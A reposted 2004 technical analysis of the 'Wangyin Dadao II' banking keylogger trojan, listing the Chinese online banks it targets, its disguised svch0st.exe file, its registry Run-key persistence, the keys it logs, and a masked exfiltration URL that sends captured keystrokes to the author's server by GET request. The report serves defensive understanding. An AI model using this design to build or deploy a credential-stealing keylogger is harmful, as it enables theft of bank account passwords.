• 微软原版系统

  • 一键重装系统

  • 纯净系统

  • 在线技术客服

魔法猪系统重装大师 一键在线制作启动 U 盘 PE 系统 用一键重装的魔法拯救失去灵魂的系统
当前位置:首页 > 教程 > 电脑教程

“网银大盗Ⅱ”技术分析报告

时间:2015年04月02日 11:39:15    来源:魔法猪系统重装大师官网    人气:2044
病毒名称:网银大盗Ⅱ(Trojan/KeyLog.Dingxa)
  病毒类型:木马
  病毒大小:16284字节
  传播方式:网络
  压缩方式:ASpack

  2004年6月2日晚,又截获“网银大盗”新变种,该木马盗取几乎涵盖中国目前所有个人网上银行的帐号、密码、验证码等等,发送给病毒作者。此木马与4月分截获网银大盗(Trojan/PSW.HidWebmon)有异曲同工之处,但涉及银行之多,范围之广是历来最大的,不但给染毒用户造成的损失更大,更直接,也给各网上银行造成更大的安全威胁和信任危机。

  具体技术特征如下:

  1. 病毒运行后,盗取的网上银行涉及:
  
  银联支付网关-->执行支付
  银联支付网关:
  中国工商银行新一代网上银行
  中国工商银行网上银行:
  工商银行网上支付:
  申请牡丹信用卡
  招商银行个人银行
  招商银行一网通:
  个人网上银行
  中国建设银行网上银行
  登陆个人网上银行;;
  中国建设银行
  中国建设银行网上银行:
  交通银行网上银行
  交通银行网上银行:
  深圳发展银行帐户查询系统
  深圳发展银行|个人银行
  深圳发展银行 | 个人用户申请表
  深圳发展银行:
  民生网个人普通版
  民生银行:
  网上银行--个人普通业务
  华夏银行:
  上海银行企业网上银行
  上海银行:
  首都电子商城商户管理平台
  首都电子商城商户管理:
  中国在线支付网: :IPAY网上支付中心
  中国在线支付网商户:
  招商银行网上支付中心
  招商银行网上支付:
  个人网上银行-网上支付

  2. 病毒算机中创建以下文件:

  %SystemDir%\svch0st.exe,16284字节,病毒本身


3. 在注册表的HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current Version\Run中创建:

  “svch0st.exe” = “%SystemDir%\svch0st.exe”
  “taskmgr.exe” = “%SystemDir%\svch0st.exe”




  4. 病毒运行后会根据IE窗口标题栏判断是否为网上银行页面,如果发现上述提到的银行后,病毒立即开始记录键盘敲击的每一个键值,记录键值包括:

  AabCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz1
  !2@3#4$5%6^7&8*9(0)
  {BackSpace}
  {Tab}
  {回车}
  {Shift}
  {Ctrl}
  {Alt}
  {Pause}
  {Esc}
  {空格}
  {End}
  {Home}
  {Left}
  {Right}
  {Up}
  {Down}
  {Insert}
  {Delete}
  ;:=+,<-_.>/?`~][{\|]}'
  {Del}
  {F1}
  {F2}
  {F3}
  {F4}
  {F5}
  {F6}
  {F7}
  {F8}
  {F9}
  {F10}
  {F11}
  {F12}
  {NumLock}
  {ScrollLock}
  {PrintScreen}
  {PageUp}
  {PageDown}

  5. 病毒截取到键盘值后,会形成信息发到指定http://*****.com/****/get.asp。其信息如下:

  http://*****.com/****/get.asp?txt=××银行:<截获的按键>

  6.病毒开启3个定时器,每隔几秒钟搜索用户的IE窗口,如果发现用户正在使用上述银行的“个人网上银行”的登陆界面,则尝试记录用户键入的所有键值,然后把窃取到的信息通过get方式发送到指定的服务器

“,网银大盗,Ⅱ,”,技术,分析报告,病毒,名称,
栏目:电脑教程 阅读:1000 2023/12/27
Win7教程 更多>>
U盘教程 更多>>
Win10教程 更多>>
魔法猪学院 更多>>

Copyright © 2015-2023 魔法猪 魔法猪系统重装大师

本站发布的系统仅为个人学习测试使用,请在下载后24小时内删除,不得用于任何商业用途,否则后果自负,请支持购买微软正版软件。

在线客服 查看微信 返回顶部